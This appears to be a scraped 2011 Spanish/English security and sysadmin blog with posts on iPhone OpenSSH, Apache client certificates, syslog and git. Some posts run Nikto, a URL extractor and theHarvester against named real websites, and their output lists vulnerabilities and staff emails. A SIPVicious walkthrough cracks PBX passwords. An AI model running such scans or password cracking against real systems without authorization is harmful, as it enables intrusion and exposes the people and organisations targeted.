file1.txt

File should exist too !!!

Thks !!

Nikto - Escaner de vulnerabilidades en servidores web

2011-10-20T21:40:00.000-07:00

Nikto es un escáner de directorios y archivos potencialmente sensibles en servidores Web. La base de datos de estos archivos y directorios contenida en la herramienta Nikto supera las 6100 entradas. Incluye además métodos y firmas de varios servidores y versiones de aplicativos web, con el fin de determinar el grado de desactualización de estos.

La versión actual es 2.1.4

Implementación y funcionamiento:

Descargar Nikto:

$wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2

Descomprimir el paquete descargado:

$ tar xvfj nikto-2.1.4.tar.bz2

Ejecucion y funcionamiento:

$cd nikto-2.1.4

$ ./nikto.pl -h http://www.deoccidente.com/

- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 72.29.92.150
+ Target Hostname: www.deoccidente.com
+ Target Port: 80
+ Start Time: 2011-10-21 23:55:30
---------------------------------------------------------------------------
+ Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Retrieved x-powered-by header: PHP/5.2.17
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ robots.txt contains 35 entries which should be manually viewed.
+ Number of sections in the version string differ from those in the database, the server reports: openssl/0.9.8e-fips-rhel5 while the database has: 1.0.0.100. This may cause false positives.
+ OpenSSL/0.9.8e-fips-rhel5 appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ mod_ssl/2.2.20 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ ETag header found on server, inode: 48835523, size: 698, mtime: 0x49ec8ab558900
+ Multiple index files found: index.php, index.html,
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-9392: /userinfo.php?uid=1;: Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.
+ OSVDB-3268: /web/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3268: /imagenes/: Directory indexing found.
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /new/: This might be interesting...
+ OSVDB-3268: /prueba/: Directory indexing found.
+ OSVDB-3092: /prueba/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /web/: This might be interesting...
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3268: /scripts/: Directory indexing found.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3268: /sites/: Directory indexing found.
+ 6448 items checked: 31 error(s) and 36 item(s) reported on remote host
+ End Time: 2011-10-22 00:38:01 (2551 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

NOTA: Nikto es un escáner web que permite recolectar información sobre como esta tu website.

Aquí están algunas de las características principales de Nikto. Consulte la documentación para obtener una lista completa de características y cómo usarlos.

SSL Support (Unix with OpenSSL or maybe Windows with ActiveState's
Perl/NetSSL)
Full HTTP proxy support
Checks for outdated server components
Save reports in plain text, XML, HTML, NBE or CSV
Template engine to easily customize reports
Scan multiple ports on a server, or multiple servers via input file (including nmap output)
LibWhisker's IDS encoding techniques
Easily updated via command line
Identifies installed software via headers, favicons and files
Host authentication with Basic and NTLM
Subdomain guessing
Apache and cgiwrap username enumeration
Mutation techniques to "fish" for content on web servers
Scan tuning to include or exclude entire classes of vulnerability
checks
Guess credentials for authorization realms (including many default id/pw combos)
Authorization guessing handles any directory, not just the root
directory
Enhanced false positive reduction via multiple methods: headers,
page content, and content hashing
A "single" scan mode that allows you to craft an HTTP request by
hand
Reports "unusual" headers seen
Interactive status, pause and changes to verbosity settings
Logging to Metasploit
Thorough documentation

Espero les guste y les funcione ....

Gracias ...

Tool: List-Urls.py

2011-10-19T23:24:00.000-07:00

List-Urls.py is a python script developed by muts [at] whitehat.co.il, allow us to extract the links from a certain web page in order to gather information about a system.

Implementation:

Download file:

http://pastebin.com/EbB4micK

Give execute permissions:

$chmod 755 list-urls.py

Real test Using a URL:

$ ./url-list.py http://www.kazak.com.co

##########################################################
# #
# Extract URLS from a web page #
# muts@whitehat.co.il #
# #
##########################################################

/index.php?option=com_content&view=frontpage&Itemid=57&lang=es
/index.php?option=com_content&view=article&id=44&Itemid=29&lang=es
/index.php?option=com_content&view=article&id=66&Itemid=83&lang=es
/index.php?option=com_wrapper&view=wrapper&Itemid=84&lang=es
/index.php?option=com_contact&view=category&catid=12&Itemid=55&lang=es
/index.php?option=com_content&view=frontpage&Itemid=1&lang=es
/index.php?option=com_content&view=article&id=44&Itemid=27&lang=es
/index.php?option=com_content&view=article&id=66&Itemid=2&lang=es
/index.php?option=com_content&view=article&id=51&Itemid=37&lang=es
/index.php?option=com_content&view=article&id=52&Itemid=41&lang=es
/index.php?option=com_content&view=article&id=54&Itemid=65&lang=es
/index.php?option=com_content&view=article&id=58&Itemid=69&lang=es
http://kazak.com.co/file/ArchivosVarios/CertificacionISO.pdf
http://www2.clustrmaps.com/counter/maps.php?url=http://www.kazak.com.co
http://www.facebook.com/pages/Soluciones-Kazak-Ltda/139063679431
/index.php?view=article&catid=38%3Atelecomunicaciones&id=50%3Avoz-sobre-ip&format=pdf&lang=es
/index.php?view=article&catid=38%3Atelecomunicaciones&id=50%3Avoz-sobre-ip&tmpl=component&print=1&layout=default&page=&lang=es
/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3d3dy5rYXphay5jb20uY28vaW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZ2aWV3PWFydGljbGUmaWQ9NTAlM0F2b3otc29icmUtaXAmY2F0aWQ9MzglM0F0ZWxlY29tdW5pY2FjaW9uZXMmSXRlbWlkPTYxJmxhbmc9ZXM%3D&lang=es
/index.php?option=com_contact&view=contact&id=1%3Acali&catid=12%3Acontacts&Itemid=55&lang=es

This script is very useful for gathering information from a site.

I hope you like ... Thks !! bye !

Tool: Geoedge IP Location.

2011-10-19T22:58:00.000-07:00

Geoedge, is a little tool to help identify the location of an IP, via services like Maxmind and GeoIpTool. It's simple and can help you when you need to identify the source of an ip fast and from the commandline. Now it provides links to Google Maps and Mapquest, with the IP location.

Implementation:

Step #1: "Download Python Script"

$wget http://www.edge-security.com/soft/geoedge.py

Step #2: "Run it"

$python geoedge.py

*************************************
*Geoedge v0.2 *
*Coded by Christian Martorella *
*cmartorella@edge-security.com *
*************************************

Usage:
python geoedge.py host/ip

Step #3: "Real test"

$python geoedge.py www.parquesoft.com

*************************************
*Geoedge v0.2 *
*Coded by Christian Martorella *
*cmartorella@edge-security.com *
*************************************

Searching in Maxmind....

Information for www.parquesoft.com by Maxmind
===========================================

IP/Host: www.parquesoft.com
Connection error...

Searching in Geoiptool....

Information by Geoiptool
========================

IP/Host: 209.239.124.177
Country: United States ,US (USA)
City: Missouri,Saint Louis
Coordinates: 38.6312,-90.1922

Note: This is a small script to ip location and is a good tool to get information.

That's all

Thks !

Instalar certificados .p12 en Iphone 3gs Safari

2011-10-19T12:48:00.000-07:00

Que es un certificado P12 ??

Los certificados P12 se utilizan para la seguridad y firmas de email y navegación por browsers “Navegadores”. Estos son identificaciones electrónicas del usuario. Cada certificado contiene una llave electrónica que tiene como propósito el intercambio seguro de información en redes. Una de las funciones primarias de el certificado p12 es encriptar correos electrónicos y la navegación por web.

Para que agregar un Certificado P12 a un navegador ??

Se agregan para asegurar la navegación entre el cliente “Firefox, Chrome o Safari”, y el servidor web.

En nuestro caso, solo el cliente que posea el certificado P12, puede acceder al sitio web; los clientes que no lo tengan, no podrán acceder.

Como Hacerlo en el Safari de mi Iphone 3Gs ?

Luego de entrar por SSH, y buscar dentro de la carpeta del navegador safari;

Luego de buscar dentro de el Icono ajustes del Iphone;

y por ultimo buscar en Internet, !!! No encontré como hacerlo. !!!!

Solución:

Pero !! al mandar el archivo P12 adjunto en un email, y luego abrir el Email desde el Iphone, e intentar abrir el Adjunto, Sale un programa que dice "Instalar Perfil " lo cual di Touch en “Instalar” Luego pidió el password del certificado P12, lo ingrese y ahora ya tengo acceso al sitio web.

ScreenShots

Gracias … espero les funcione !!!

Howto - Syslog Server

2011-10-18T23:59:00.000-07:00

Wikipedia:

Syslog is a standard for logging program messages. It allows separation of the software that generates messages from the system that stores them and the software that reports and analyzes them. It also provides devices which would otherwise be unable to communicate a means to notify administrators of problems or performance.

Syslog can be used for computer system management and security auditing as well as generalized informational, analysis, and debugging messages. It is supported by a wide variety of devices (like printers and routers) and receivers across multiple platforms. Because of this, syslog can be used to integrate log data from many different types of systems into a central repository.

Messages refer to a facility (auth, authpriv, daemon, cron, ftp, lpr, kern, mail, news, syslog, user, uucp, local0, ... , local7 ) and are assigned a priority/level (Emergency, Alert, Critical, Error, Warning, Notice, Info or Debug) by the sender of the message.

Configuration allows directing messages to various local devices (console), files (/var/log/) or remote syslog daemons. Care must be taken when updating the configuration as omitting or misdirecting message facilities or levels can cause important messages to be ignored by syslog or overlooked by the administrator.

Install syslog server

Install syslog service

Step #1: "Check that the Linux operating system installed sysklogd"

how to prove ? with the following command:

#ls /etc/init.d/sysklogd

if it is not installed .... so ...

#apt-get install sysklogd

Step #2: "Configure sysklogd"

Step #2.1: "Stop sysklogd"

#/etc/init.d/sysklogd stop

Step #2.2 "in some servers, you can find the config files in two places:"

/etc/init.d/sysklogd
or
/etc/default/sysklogd

edit file and add:

SYSLOGD="-ru syslog"

then start service:

#/etc/init.d/sysklog restart

Step #3: "Verify that the sysklogd service is listening on port 514"

#netstat -putan | grep 514

Something like this should be printed:

udp 0 0 0.0.0.0:514 0.0.0.0:* 17676/syslogd

Step #4: "Configure logs for each server:"

#vi /etc/syslog.conf

add servers as follows:

+10.0.0.1
*.* /var/log/server1.log

+10.0.0.2
*.* /var/log/server2.log

+10.0.0.3
*.* /var/log/server3.log

Restart service:

#/etc/init.d/sysklogd restart

Step #5: "add clients to /etc/hosts"

#vi /etc/hosts

and add as follows:

10.0.0.1 server1
10.0.0.2 server2
10.0.0.3 server3

Configure Clients

#vi /etc/syslog.conf

add as follows:

*.* @10.0.0.10

server syslog = 10.0.0.10

Restart service:

#/etc/init.d/syslog restart

Check server logs

'''In main server'''

If you want to see the 10.0.0.1 server log, go to /var/log/server1.log

#tail -f /var/log/server1.log

If you want to see the 10.0.0.2 server log, go to /var/log/server2.log

#tail -f /var/log/server2.log

If you want to see the 10.0.0.3 server log, go to /var/log/server3.log

#tail -f /var/log/server3.log

Special configurations

SYSLOG CONFIGURE IN SYSLOG CLIENTS

# apt-get install sysklogd

# vi /etc/syslog.conf

Add lines:

# define paths for syslog

local0.err -/var/log/server_error.log
local1.info -/var/log/server_info.log
local2.debug -/var/log/server_debug.log

Restar syslog:

# /etc/init.d/sysklogd restart

This print 3 logs, the files are: server_error.log, server_info.log y server_debug.log.

Thks !!

Theharvester

2011-10-18T23:37:00.000-07:00

This objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tools is intended to help Penetration testers in the early stages of the project.

Implementation:

Step #1: "Download Software from official site"

Download List

Step #2 : "Uncompress downloaded file "

$tar xvf theharvester-ng-2.0.tar

Step #3: "Run it "

$ python theHarvester.py

*************************************
*TheHarvester Ver. 2.0 (reborn) *
*Coded by Christian Martorella *
*Edge-Security Research *
*cmartorella@edge-security.com *
*************************************

Usage: theharvester options

-d: Domain to search or company name
-b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,exalead,all)
-s: Start in result number X (default 0)
-v: Verify host name via dns resolution and search for vhosts(basic)
-l: Limit the number of results to work with(bing goes from 50 to 50 results,
google 100 to 100, and pgp does'nt use this option)
-f: Save the results into an XML file

Examples:./theharvester.py -d microsoft.com -l 500 -b google
./theharvester.py -d microsoft.com -b pgp
./theharvester.py -d microsoft -l 200 -b linkedin

Step #4: "Exemplary target"

$ python theHarvester.py -d intep.edu.co -l 300 -b google

*************************************
*TheHarvester Ver. 2.0 (reborn) *
*Coded by Christian Martorella *
*Edge-Security Research *
*cmartorella@edge-security.com *
*************************************

[-] Searching in Google:
Searching 100 results...
Searching 200 results...
Searching 300 results...
Searching 400 results...
['www.intep.edu.co', 'intepvirtual.intep.edu.co', 'ipira.intep.edu.co', 'weblog.intep.edu.co', 'wap.intep.edu.co', '3d.intep.edu.co', '1.www.intep.edu.co', 'root.intep.edu.co', '...intep.edu.co', 'busca...intep.edu.co', 'wargame.intep.edu.co', '...www.intep.edu.co', 'ceinfo.intep.edu.co', 'congreso.intep.edu.co']

[+] Emails found:
-------------
secregeneral@intep.edu.co
rectoria@intep.edu.co
sistemas@intep.edu.co
educoandes@intep.edu.co
registrocontrol@intep.edu.co
flisol@intep.edu.co
anam.bueno@intep.edu.co
carlos.roldan@intep.edu.co
webmaster@intep.edu.co
contratos@intep.edu.co
mercadeo@intep.edu.co
almacen@intep.edu.co
bueno@intep.edu.co
a@intep.edu.co
Camachosecregeneral@intep.edu.co
biblioteca@intep.edu.co
ceinfo@intep.edu.co
julian.galvez@intep.edu.co

[+] Hosts found
-----------
186.113.18.107:www.intep.edu.co
186.113.18.106:intepvirtual.intep.edu.co
186.113.18.106:ipira.intep.edu.co
186.113.18.107:weblog.intep.edu.co
186.113.18.107:wap.intep.edu.co
186.113.18.107:3d.intep.edu.co
186.113.18.107:wargame.intep.edu.co
186.113.18.107:ceinfo.intep.edu.co

that's all

Thks !

Apache2, ssl y autenticación con certificados p12

2011-10-18T19:50:00.001-07:00

Manos a la obra !!!

Primero generamos la llave privada del servidor; en mi caso voy a crear una de 2048:

#openssl genrsa -des3 -out _x1nux.host.net.key 2048

Al generar dicha llave nos va a pedir un password, este password debe ser recordado por siempre, pues se va a usar para firmar los certificados hijos, y también para poder iniciar el servidor apache, en caso de que actualices algún tipo de configuración en el.

En caso de que quieras deshabilitar la pedida de password al reiniciar o iniciar el servicio de apache; usa el siguiente comando y utiliza el siguiente certificado para la configuración del apache:

#openssl rsa -in _x1nux.host.net.key -out _x1nux.host.net.pem

Pedirá un password que fue el que dimos al generar la llave principal.

Ahora generamos los archivos csr, en donde ingresaremos la información de nuestra empresa u de nuestro host.

#openssl req -new -key _x1nux.host.net.key -out _x1nux.host.net.csr

Nos pedirá la información siguiente:

----- Country Name (2 letter code) [AU]:CO

State or Province Name (full name) [Some-State]:Valle

Locality Name (eg, city) []:Cali

Organization Name (eg, company) Host

Organizational Unit Name (eg, section) []:HostCert

Common Name (eg, YOUR name) []:Host.net

Email Address []:x1nux@host.net

En caso de que pida password, das el que te pidió al generar la primera llave.

Ahora vamos a generar un certificado auto-firmado con 10 años de vigencia :

#openssl x509 -req -days 3650 -in _x1nux.host.net.csr -signkey _x1nux.host.net.key -out _x1nux.host.net.crt

Pedirá el password de la llave primaria: “El que debes recordar siempre”

Ahora generamos el certificado P12 el cual se va a configurar como el único que pueda acceder al servidor apache:

#openssl pkcs12 -export -out _x1nux.host.net.p12 -inkey _x1nux.host.net.key -in _x1nux.host.net.crt

Luego pedirá el password de la llave principal; y luego el password para proteger este mismo certificado P12.

NOTA: La persona que tenga este certificado, es el único que va poder acceder al sitio web; lo que quiere decir que el administrador del servidor web debe entregar este certificado a los usuarios que deseen acceder a el sitio web, para que lo agreguen al navegador; ademas el certificado puede ser protegido con un password adicional, que a la hora de ser agregado a un navegador, pida ese password.

Configurar apache para que trabaje con los certificados:

Editar el archivo donde tengan configurado el servicio de apache, en mi caso /etc/apache2/sites-enable/default-ssl

y modificar las lineas de ssl de la siguiente manera:

SSLEngine on

SSLProtocol all -SSLv2

SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW

SSLVerifyClient require

SSLCertificateFile /etc/apache2/cert-apache2/x1nux/_x1nux.host.net.crt

SSLCACertificateFile /etc/apache2/cert-apache2/x1nux/_x1nux.host.net.crt

SSLCertificateKeyFile /etc/apache2/cert-apache2/x1nux/_x1nux.host.net.pem

Luego reiniciar el servicio de apache:

#/etc/init.d/apache2 restart

Pruebas:

Ingresar desde una maquina de la misma red, al servidor apache que acabamos de instalar; y veras que no tienes acceso, te imprimirá un error, o solo se quedara cargando sin entrar al sitio.

Luego hacer la prueba cogiendo el certificado .p12 y agregarlo en el navegador de una maquina de la misma red donde este el servidor apache que acabamos de configurar, e intentar logear. Y debe de ingresar al sitio.

Eso es todo; espero les sirva el manual.

Iphone 3Gs Mp3 Ringtones desde Ubuntu

2011-10-14T12:11:00.000-07:00

Con dolor de cabeza y escuchando la lluvia como cae en mi casa, me acorde que un amigo antes conocido como ANARKIA, me habia dicho que no se podia colocar los Mp3 que uno tiene en la maquina local, en el Iphone como Ringtones, y que ademas solo se puede hacer desde Itunes; entonces decidi darme la pela e Investigar. ...

Aclaro: !!!

1. No acepta los Mp3 - pero si los m4a o m4r.
2. Es falso que solo se puede desde Itunes.

Manos a la obra, usaremos linux Ubuntu como ejemplo ya que es lo mas comercial:

1r0: Debes coger el Mp3 que te gusta y cortar entre 0 y 3 Min que es lo que soportan los Ringotnes de Iphone.

En linux lo puedes hacer con: Audacity - mp3splt - mp3cut, SoundComverter u otros.

2d0: Luego debes comvertirlo a m4a, en linux lo puedes hacer con Audacity, SoundComverter u otros.

3r0: Debes renombrar el archivo.m4a que vas a colocar en tu Iphone a archivo.m4r

4t0: Si tu Iphone tiene OpenSSH, entonces puedes pasarlo por medio de SSH y colocarlo en la siguiente ruta:

/Library/Ringtones/

5t0: En el phone ir a Ajustes/Sonidos/Tono de Llamada y Seleccionar el Ringtone que creaste !!

Script para crear Ringtones desde ubuntu:

Requerimientos:

Instalar los siguientes paquetes:

#apt-get install pacpl
#apt-get install poc-streamer

ringtone-script-upload.bash:

#--- INICIO script.

#!/bin/bash

#Cortar el MP3 16 Segundos
mp3cut -o output.mp3 -t 00:00:00+000-00:00:16+000 $1

#Comvertir el MP3 a formato m4a
pacpl -t m4a output.mp3

#Renombrar el archivo .m4a a .m4r
mv output.m4a output.m4r

#Copiar el archivo .m4r a el Iphone
scp -r output.m4r root@iphone:/Library/Ringtones/

#--- FIN script

Recuerde lo siguiente:

1. El password del Iphone es "alpine".
2. Debe mirar que IP le dio el Wifi al Iphone y colocarla en el /etc/hosts de la siguiente manera:

/etc/hosts

192.168.0.5 iphone

3. Recuerde darle chmod 755 al ringtone-script-upload.bash
4. Que tenga un feliz RingtonDay !

bye !

Instalar Openssh en Iphone 3gs

2011-10-14T11:36:00.000-07:00

Instalación Servidor OpenSSH

Para poder instalar el Openssh-server en el Iphoe 3Gs, lo primero que debes hacer es el JailBerak del teléfono, de lo contrario no vas a poder añadir las aplicaciones de Linux que vas a necesitar. Si aún no sabes como hacer el JailBreak, ingresa a http://miipodtouch.com/

Luego de realizar el JailBreak, solo debes seguir las siguientes instrucciones:

Abrir Cydia:

Click o touch

Ir al tag buscar:

Click o touch

En el área de "Buscar", ingresa la palabra "Openssh" y luego da click en el botón "Buscar". En la lista debe aparecerte la opción OpenSSH. En mi caso, la aplicación ya está instalada, es por eso que en la imagen se muestra un chulito.

Como no lo tienes instalado, haz click o touch sobre la palabra OpenSSH.

A continuación, la pantalla “Detalles” será desplegada. En ella, vas a encontrar el botón “Instalar”. En mi caso aparece la opción “Modificar” porque ya lo tengo instalado. Haz click o touch sobre la opción “Instalar”.

Siguiendo con el procedimiento, la pantalla “Confirmar” será desplagada en tu movil. Haz click o touch en el botón “Confirmar”.

Luego te van a aparecer una gran cantidad de mensajes en la pantalla. No te preocupes, es parte del proceso de instalación. Una vez finalizado ya cuentas con un servidor OpenSSH en tu Iphone 3Gs

Nota #1: Para realizar la instalación de forma óptima, cuando acabes de instalar el OpenSSH, por favor reinicia tu teléfono.

Acceder Iphone por SSH:

Windows User's:

Para acceder al teléfono desde una maquina Windows solo tienes que buscar en Internet un programa llamado Putty – para terminal o WinSCP para una administración más gráfica.

Linx User's

Para acceder al teléfono desde una maquina con Linux, solo debes abrir una Terminal e ingresar los datos de conexión de tu móvil, o usar un navegador con soporte “sftp” como “Konqueror” en caso de que te guste KDE. Para los que usan Gnome, hay una opción llamada “Conectar con un servidor” en la parte del menú principal “Lugares o Places”. Desde allí puedes ingresar los datos de conexión al teléfono.

Configuración de las credenciales IP para conectarse al Iphone:

Normalmente las personas que tienen un Iphone, cuentan con un dispositivo inalambrico o router para acceder a Internet. En nuestro caso, solo debemos conectar el telefono a la red inalambrica para que automáticamente un IP le sea asignado; dicho IP es el que necesitaremos para hacer la conexión.

Miremos las imágenes:

Click o touch en Ajustes:

Click o touch en WI-FI:

En mi caso, puede apreciarse que mi teléfono está conectado a la red unknown. Independiente de como se llame la red a la que tienes acceso, debes dar click o touch en el “Simbolo Mayor” para ver los detalles:

En el primer registro de la pantalla, vas a encontrar el IP al que debes conectarte:

Muestra de conexión por terminal usando Linux

Muestra de Conexión por putty usando Windows 7

Imagen 1

Imagen 2

NOTA IMPORTANTE: Por omisión, el usuario de conexión por ssh al Iphone es "root" y el password es "alpine"

Si deseas cambiarlo solo debes entrar por una terminal al Iphone y ejecutar:

passwd

Este comando te pedirá una clave nueva, la cual debes ingresar dos veces y eso es todo.

Si tienes dudas o comentarios sobre este articulo, realiza un post al final del articulo. Gracias por tu atención !!!

Git - Fast Version Control System

2011-10-14T11:10:00.000-07:00

Git - (Wikipedia)

Git is a distributed revision control system with an emphasis on speed.[4] Git was initially designed and developed by Linus Torvalds for Linux kernel development. Every Git working directory is a full-fledged repository with complete history and full revision tracking capabilities, not dependent on network access or a central server. Git's current software maintenance is overseen by Junio Hamano. Git is free software distributed under the terms of the GNU General Public License

Proceeding to Install

The process was tested in:

Operating system: Ubuntu 11.04, Debian 6, Slackware 13.37

Install git server:

Step 1 "Install git software"

Slackware installation:

Note 1: In slackware, you can use: slackpkg, slapt-get or search in the official repository.

so ...

slackpkg:

#slackpkg search git

[ ininstalled ] - git-1.7.4.4-x86_64-1

#slackpkg install git-1.7.4.4-x86_64-1

slapt-get:

#slapt-get --search git

git-1.7.4.4-x86_64-1 [inst=no: git (the stupid content tracker)

#slapt-get –install git-1.7.4.4-x86_64-1

from offical repository:

Download package and:

#installpkg git-1.7.4.4-x86_64-1.txz

Ubuntu or Debian installation:

#apt-get install git-core

Step 2 “Create the git user in the Linux system ”

#useradd -m git

Step 3 “Log in as git in the linux system ”

#su – git

Step 4 “Create our work directory ”

Note 0: In this case we use gittest.git, as our demo work directory

#mkdir gittest.git

Step 5 “Create our work repository ”

#cd gittest.git

#git –bare init

Now our git server is ready to use.

Git - Linux client configuration

The process was tested in:

Operatin System: Ubuntu 11.04, Debian 6, Slackware 13.37

Slackware installation:

Note 1: In slackware, you can use: slackpkg, slapt-get or search in the official repository.

so ...

slackpkg:

#slackpkg search git

[ ininstalled ] - git-1.7.4.4-x86_64-1

#slackpkg install git-1.7.4.4-x86_64-1

slapt-get:

#slapt-get --search git

git-1.7.4.4-x86_64-1 [inst=no: git (the stupid content tracker)

#slapt-get –install git-1.7.4.4-x86_64-1

from offical repository:

Download package and:

#installpkg git-1.7.4.4-x86_64-1.txz

Ubuntu or Debian installation:

#apt-get install git-core

Git works through ssh, so.. you can use ssh keys to authenticate without a password, or you can use a password simply. Remember change the git user password in server.

Some git client commands

Get copies from repository:

$git clone ssh://git@192.168.1.100:22/~/gittest.git

Add file to repository:

$echo “Mi first file” > file.txt

$git add file.txt

$git commit -a -m “My first commint”

$git push origin master

Update repository:

$git pull origin master

Check logs:

$git log

Back to previous version, in case of error:

$git log

so ...

Search the ID number to return to the previous version

$git checkout ID

that is all

thks !

Bibliography

http://git-scm.com/

SIPVicious tool suite

2011-10-12T18:33:00.000-07:00

What is SIPVicious tool suite?

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools:

svmap - this is a sip scanner. Lists SIP devices found on an IP range
svwar - identifies active extensions on a PBX
svcrack - an online password cracker for SIP PBX
svreport - manages sessions and exports reports to various formats
svcrash - attempts to stop unauthorized svwar and svcrack scans

Requirements

Python

SIPVicious works on any system that supports python 2.4 or greater.

Operating System

It was tested on the following systems:

Linux
Mac OS X
Windows
FreeBSD 6.2
Jailbroken iPhone with python installed

GettingStarted

I'll assume that your network is on the 192.168.1.0 subnet from now on, and our asterisk server is 192.168.1.100, so ...

First run svmap.py against your subnet to find your Asterisk box:

user@box$./svmap.py 192.168.1.1/24

This command will find, our asterisk server.

| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.100:5060 | Asterisk PBX |

You should get results similar to the above.

To identify the extensions in our asterisk server, you can use the following command:

user@box$./svwar.py 192.168.1.100

| Extension | Authentication  |
-------------------------------
| 1000       | reqauth        |
| 1001       | reqauth        |
| 1002       | noauth         |

As you can see, extension 1002 does not require authentication. Finally to crack the password for 100, we just run the following command:

user@box$./svcrack.py 192.168.1.100 -u 1002

| Extension  | Password  |
--------------------------
| 1002       | 1002      |

Should print something like this.

To crack an alphanumeric password we need to make use of a dictionary file. Create a text file called "dictionary.txt" containing your password.

user@box$./svcrack.py 192.168.1.100 -u 1000 -d dictionary.txt

| Extension | Password |
------------------------
| 1000      | secret   |

Assuming that we were successful, should print something like this.

Now having cracked the extension, you can make use of the credentials by making use of a SIP softphone such as Linphone, X-lite or Zoiper.

How to prevent such attacks

There is a tool called Fail2Ban:

Fail2ban (Wikipedia)

Fail2ban is an intrusion prevention framework written in the Python programming language. It is able to run on POSIX systems that have an interface to a packet-control system or firewall installed locally (for example, iptables or TCP Wrapper).

Fail2ban's main function is to block selected IP addresses that may belong to hosts that are trying to breach the system's security. It determines the hosts to be blocked by monitoring log files (e.g. /var/log/pwdfail, /var/log/auth.log, etc.) and bans any host IP that makes too many login attempts or performs any other unwanted action within a time frame defined by the administrator.^[2] Fail2ban is typically set up to unban a blocked host within a certain period, so as to not "lock out" any genuine connections that may have been temporarily misconfigured.^[3] However, an unban time of several minutes is usually enough to stop a network connection being flooded by malicious connections, as well as reducing the likelihood of a successful dictionary attack.

Fail2ban can perform multiple actions whenever an abusive IP is detected: update Netfilter/iptables firewall rules, or alternatively TCP Wrapper's hosts.deny table, to reject an abuser's IP address; email notifications; or any user-defined action that can be carried out by a Python script.^[4]

The standard configuration ships with filters for Apache, Lighttpd, sshd, vsftpd, qmail, Postfix and Courier Mail Server. Filters are defined by Python regexes, which may be conveniently customized by an administrator familiar with regular expressions. A combination of a filter and an action is known as a "jail",^[5] and is what causes a malicious host to be blocked from accessing specified network services.^[6] As well as the examples that are distributed with the software, a "jail" may be created for any network-facing process that creates a log file of access

Fail2Ban; Installation:

Using Ubuntu as the operating system:

root@sipbox#apt-get install fail2ban iptables python

Configure Fail2Ban

We need to create a configuration for Fail2Ban so that it can understand attacks against Asterisk.

Create a new filter configuration for Asterisk:

root@sipbox#vi /etc/fail2ban/filter.d/asterisk.conf

add the following lines;

# Fail2Ban configuration file
#
#
# $Revision: 250 $
#

[INCLUDES]

# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf

[Definition]

#_daemon = asterisk

# Option: failregex
# Notes.: regex to match the password failures messages in the logfile. The
# host must be matched by a group named "host". The tag "" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P\S+)
# Values: TEXT
#

failregex = NOTICE.* .*: Registration from '.*' failed for '' - Wrong password
NOTICE.* .*: Registration from '.*' failed for '' - No matching peer found
NOTICE.* .*: Registration from '.*' failed for '' - Username/auth name mismatch
NOTICE.* .*: Registration from '.*' failed for '' - Device does not match ACL
NOTICE.* .*: Registration from '.*' failed for '' - Peer is not supposed to register
NOTICE.* .*: Registration from '.*' failed for '' - ACL error (permit/deny)
NOTICE.* .*: Registration from '.*' failed for '' - Device does not match ACL
NOTICE.* failed to authenticate as '.*'$
NOTICE.* .*: No registration for peer '.*' $from $
NOTICE.* .*: Host failed MD5 authentication for '.*' (.*)
NOTICE.* .*: Failed to authenticate user .*@.*

# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =

Next edit /etc/fail2ban/jail.conf to include the following section so that it uses the new filter. This does a 3-day ban on the IP that performed the attack. It is recommend to set the bantime in the [DEFAULT] section so if affects all attacks.

It is also recommend to turn on an iptables ban for ssh, httpd/apache, and ftp if they are running on the system. Be sure to edit the sendmail-whois action to send notifications to an appropriate address:

root@sipbox#vi /etc/fail2ban/jail.conf

[asterisk-iptables]

enabled = true
filter = asterisk
action = iptables-allports[name=ASTERISK, protocol=all]

